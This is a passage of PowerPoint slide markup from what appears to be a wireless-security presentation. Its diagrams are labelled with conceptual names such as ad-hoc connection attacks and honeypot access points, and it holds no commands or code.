            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6685765" y="3091551"/>
              <a:ext cx="2623398" cy="1703068"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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33" name="Rectangle 1732">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E61C587A-3A6D-4511-A14A-B53B6408B447}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6927324" y="2484299"/>
              <a:ext cx="1559917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User Enabled Wi-Fi Ad Hoc Connection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1734" name="Text Box 2985">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B07D9A-7E8D-4C2C-BCE0-B77C82DD5E2F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9041686" y="5812380"/>
              <a:ext cx="91243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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1735" name="Rectangle 1734">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49113F8D-2454-414E-99B8-CDA6B7683F66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2174558" y="1314485"/>
              <a:ext cx="1707455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Hotel Wi-Fi Network</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1736" name="Group 1735">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE96F71-A0D8-4362-833B-1F1119DC14CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9197505" y="4498385"/>
              <a:ext cx="1129603" cy="1182096"/>
              <a:chOff x="10865198" y="4598375"/>
              <a:chExt cx="1129603" cy="1182096"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1743" name="Picture 1742">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CABEAD16-A5D6-4620-BC0A-F4F082ED4D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865198" y="4603406"/>
                <a:ext cx="1129603" cy="1177065"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1744" name="Picture 1743" descr="A picture containing bridge&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE2B89C1-064D-4541-8DF0-F9BB16A8FB81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21021"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="11074351" y="4598375"/>
                <a:ext cx="434685" cy="357663"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1737" name="Picture 1736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5B906F4B-1332-4668-9864-D7C7761DDBB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7606069" y="1417802"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1738" name="Picture 1737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4A7FD894-6D75-4851-AE55-05225EE32C5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4157160" y="2995056"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1739" name="Picture 1738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7CAD75EF-822C-46D4-AE52-04C001F1829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5507300" y="2316111"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1740" name="Picture 1739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043EB17D-5916-4DCC-B5DA-48DCC4426C9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5602967" y="3428026"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1741" name="Picture 1740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D58289FB-07F7-4738-94C1-B9C67382ADE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6747928" y="2627693"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1742" name="Picture 1741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2D1B467F-0694-4C6A-803A-DEABB5C0CFB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6561840" y="2179252"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2494" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDAF5766-590C-4996-AEF7-93D2038CA751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2703759" y="158750"/>
            <a:ext cx="6784483" cy="58578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Ad-Hoc Connection Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2495" name="Freeform 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6FB39B-91F2-48CF-A396-A78FD85F5DD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617032" y="4092886"/>
            <a:ext cx="360941" cy="360943"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 195663 w 587"/>
              <a:gd name="T1" fmla="*/ 73611 h 588"/>
              <a:gd name="T2" fmla="*/ 195663 w 587"/>
              <a:gd name="T3" fmla="*/ 73611 h 588"/>
              <a:gd name="T4" fmla="*/ 167608 w 587"/>
              <a:gd name="T5" fmla="*/ 101619 h 588"/>
              <a:gd name="T6" fmla="*/ 129483 w 587"/>
              <a:gd name="T7" fmla="*/ 111673 h 588"/>
              <a:gd name="T8" fmla="*/ 152502 w 587"/>
              <a:gd name="T9" fmla="*/ 86538 h 588"/>
              <a:gd name="T10" fmla="*/ 155020 w 587"/>
              <a:gd name="T11" fmla="*/ 86538 h 588"/>
              <a:gd name="T12" fmla="*/ 183074 w 587"/>
              <a:gd name="T13" fmla="*/ 58530 h 588"/>
              <a:gd name="T14" fmla="*/ 183074 w 587"/>
              <a:gd name="T15" fmla="*/ 30522 h 588"/>
              <a:gd name="T16" fmla="*/ 155020 w 587"/>
              <a:gd name="T17" fmla="*/ 30522 h 588"/>
              <a:gd name="T18" fmla="*/ 124447 w 587"/>
              <a:gd name="T19" fmla="*/ 58530 h 588"/>
              <a:gd name="T20" fmla="*/ 124447 w 587"/>
              <a:gd name="T21" fmla="*/ 58530 h 588"/>
              <a:gd name="T22" fmla="*/ 124447 w 587"/>
              <a:gd name="T23" fmla="*/ 58530 h 588"/>
              <a:gd name="T24" fmla="*/ 101788 w 587"/>
              <a:gd name="T25" fmla="*/ 84024 h 588"/>
              <a:gd name="T26" fmla="*/ 111859 w 587"/>
              <a:gd name="T27" fmla="*/ 43448 h 588"/>
              <a:gd name="T28" fmla="*/ 139554 w 587"/>
              <a:gd name="T29" fmla="*/ 15440 h 588"/>
              <a:gd name="T30" fmla="*/ 195663 w 587"/>
              <a:gd name="T31" fmla="*/ 15440 h 588"/>
              <a:gd name="T32" fmla="*/ 195663 w 587"/>
              <a:gd name="T33" fmla="*/ 73611 h 588"/>
              <a:gd name="T34" fmla="*/ 81286 w 587"/>
              <a:gd name="T35" fmla="*/ 147222 h 588"/>
              <a:gd name="T36" fmla="*/ 81286 w 587"/>
              <a:gd name="T37" fmla="*/ 147222 h 588"/>
              <a:gd name="T38" fmla="*/ 81286 w 587"/>
              <a:gd name="T39" fmla="*/ 147222 h 588"/>
              <a:gd name="T40" fmla="*/ 73733 w 587"/>
              <a:gd name="T41" fmla="*/ 149736 h 588"/>
              <a:gd name="T42" fmla="*/ 63303 w 587"/>
              <a:gd name="T43" fmla="*/ 139681 h 588"/>
              <a:gd name="T44" fmla="*/ 65820 w 587"/>
              <a:gd name="T45" fmla="*/ 132141 h 588"/>
              <a:gd name="T46" fmla="*/ 132001 w 587"/>
              <a:gd name="T47" fmla="*/ 66070 h 588"/>
              <a:gd name="T48" fmla="*/ 139554 w 587"/>
              <a:gd name="T49" fmla="*/ 61043 h 588"/>
              <a:gd name="T50" fmla="*/ 149984 w 587"/>
              <a:gd name="T51" fmla="*/ 71097 h 588"/>
              <a:gd name="T52" fmla="*/ 147467 w 587"/>
              <a:gd name="T53" fmla="*/ 78638 h 588"/>
              <a:gd name="T54" fmla="*/ 147467 w 587"/>
              <a:gd name="T55" fmla="*/ 78638 h 588"/>
              <a:gd name="T56" fmla="*/ 81286 w 587"/>
              <a:gd name="T57" fmla="*/ 147222 h 588"/>
              <a:gd name="T58" fmla="*/ 58267 w 587"/>
              <a:gd name="T59" fmla="*/ 124600 h 588"/>
              <a:gd name="T60" fmla="*/ 58267 w 587"/>
              <a:gd name="T61" fmla="*/ 124600 h 588"/>
              <a:gd name="T62" fmla="*/ 30572 w 587"/>
              <a:gd name="T63" fmla="*/ 152249 h 588"/>
              <a:gd name="T64" fmla="*/ 30572 w 587"/>
              <a:gd name="T65" fmla="*/ 180257 h 588"/>
              <a:gd name="T66" fmla="*/ 58267 w 587"/>
              <a:gd name="T67" fmla="*/ 180257 h 588"/>
              <a:gd name="T68" fmla="*/ 86322 w 587"/>
              <a:gd name="T69" fmla="*/ 152249 h 588"/>
              <a:gd name="T70" fmla="*/ 88840 w 587"/>
              <a:gd name="T71" fmla="*/ 152249 h 588"/>
              <a:gd name="T72" fmla="*/ 111859 w 587"/>
              <a:gd name="T73" fmla="*/ 129627 h 588"/>
              <a:gd name="T74" fmla="*/ 101788 w 587"/>
              <a:gd name="T75" fmla="*/ 167690 h 588"/>
              <a:gd name="T76" fmla="*/ 73733 w 587"/>
              <a:gd name="T77" fmla="*/ 195698 h 588"/>
              <a:gd name="T78" fmla="*/ 17624 w 587"/>
              <a:gd name="T79" fmla="*/ 195698 h 588"/>
              <a:gd name="T80" fmla="*/ 17624 w 587"/>
              <a:gd name="T81" fmla="*/ 139681 h 588"/>
              <a:gd name="T82" fmla="*/ 45679 w 587"/>
              <a:gd name="T83" fmla="*/ 111673 h 588"/>
              <a:gd name="T84" fmla="*/ 83804 w 587"/>
              <a:gd name="T85" fmla="*/ 99106 h 588"/>
              <a:gd name="T86" fmla="*/ 58267 w 587"/>
              <a:gd name="T87" fmla="*/ 124600 h 58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87" h="588">
                <a:moveTo>
                  <a:pt x="544" y="205"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="544" y="205"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="466" y="283"/>
                  <a:pt x="466" y="283"/>
                  <a:pt x="466" y="283"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="438" y="311"/>
                  <a:pt x="396" y="319"/>
                  <a:pt x="360" y="311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="424" y="241"/>
                  <a:pt x="424" y="241"/>
                  <a:pt x="424" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="424" y="241"/>
                  <a:pt x="424" y="241"/>
                  <a:pt x="431" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="509" y="163"/>
                  <a:pt x="509" y="163"/>
                  <a:pt x="509" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="530" y="142"/>
                  <a:pt x="530" y="106"/>
                  <a:pt x="509" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="487" y="64"/>
                  <a:pt x="452" y="64"/>
                  <a:pt x="431" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="163"/>
                  <a:pt x="346" y="163"/>
                  <a:pt x="346" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="234"/>
                  <a:pt x="283" y="234"/>
                  <a:pt x="283" y="234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268" y="191"/>
                  <a:pt x="283" y="149"/>
                  <a:pt x="311" y="121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="388" y="43"/>
                  <a:pt x="388" y="43"/>
                  <a:pt x="388" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="431" y="0"/>
                  <a:pt x="501" y="0"/>
                  <a:pt x="544" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="586" y="85"/>
                  <a:pt x="586" y="156"/>
                  <a:pt x="544" y="205"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="226" y="410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="226" y="410"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="417"/>
                  <a:pt x="212" y="417"/>
                  <a:pt x="205" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="417"/>
                  <a:pt x="176" y="403"/>
                  <a:pt x="176" y="389"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="382"/>
                  <a:pt x="176" y="375"/>
                  <a:pt x="183" y="368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="367" y="184"/>
                  <a:pt x="367" y="184"/>
                  <a:pt x="367" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="374" y="177"/>
                  <a:pt x="381" y="170"/>
                  <a:pt x="388" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="170"/>
                  <a:pt x="417" y="184"/>
                  <a:pt x="417" y="198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="205"/>
                  <a:pt x="417" y="212"/>
                  <a:pt x="410" y="219"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="226" y="410"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="162" y="347"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="162" y="347"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="85" y="424"/>
                  <a:pt x="85" y="424"/>
                  <a:pt x="85" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="446"/>
                  <a:pt x="63" y="481"/>
                  <a:pt x="85" y="502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="530"/>
                  <a:pt x="141" y="530"/>
                  <a:pt x="162" y="502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="424"/>
                  <a:pt x="240" y="424"/>
                  <a:pt x="240" y="424"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="247" y="424"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="311" y="361"/>
                  <a:pt x="311" y="361"/>
                  <a:pt x="311" y="361"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="396"/>
                  <a:pt x="311" y="439"/>
                  <a:pt x="283" y="467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="545"/>
                  <a:pt x="205" y="545"/>
                  <a:pt x="205" y="545"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="587"/>
                  <a:pt x="92" y="587"/>
                  <a:pt x="49" y="545"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="502"/>
                  <a:pt x="0" y="432"/>
                  <a:pt x="49" y="389"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="311"/>
                  <a:pt x="127" y="311"/>
                  <a:pt x="127" y="311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="276"/>
                  <a:pt x="198" y="269"/>
                  <a:pt x="233" y="276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="347"/>
                  <a:pt x="162" y="347"/>
                  <a:pt x="162" y="34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lIns="50789" tIns="50789" rIns="50789" bIns="50789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457098"/>
            <a:endParaRPr lang="en-US" sz="2900">
              <a:solidFill>
                <a:srgbClr val="44CEB9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798617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A81E2964-BF7E-41B7-9391-5D219782E90F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2895600" y="158750"/>
            <a:ext cx="6400800" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Honeypot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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AP </a:t>
            </a:r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Attack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371D4AD-977C-488E-A2FF-D264926E897C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1719189" y="1222491"/>
            <a:ext cx="8753623" cy="5186481"/>
            <a:chOff x="1724325" y="1222491"/>
            <a:chExt cx="8753623" cy="5186481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="892" name="Rectangle 891"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4874659" y="5837409"/>
              <a:ext cx="5170635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Attacker traps victims using fake hotspots</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="4" name="Straight Connector 3"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3432824" y="4909338"/>
              <a:ext cx="1317666" cy="395484"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0070C0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Group 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1737360" y="1525042"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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4" name="Group 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4099560" y="1525042"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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2" name="Group 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6496075" y="1525042"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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5" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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8" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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9" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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30" name="Group 2509"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4861560" y="2168540"/>
              <a:ext cx="1366144" cy="396408"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Freeform 2510"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
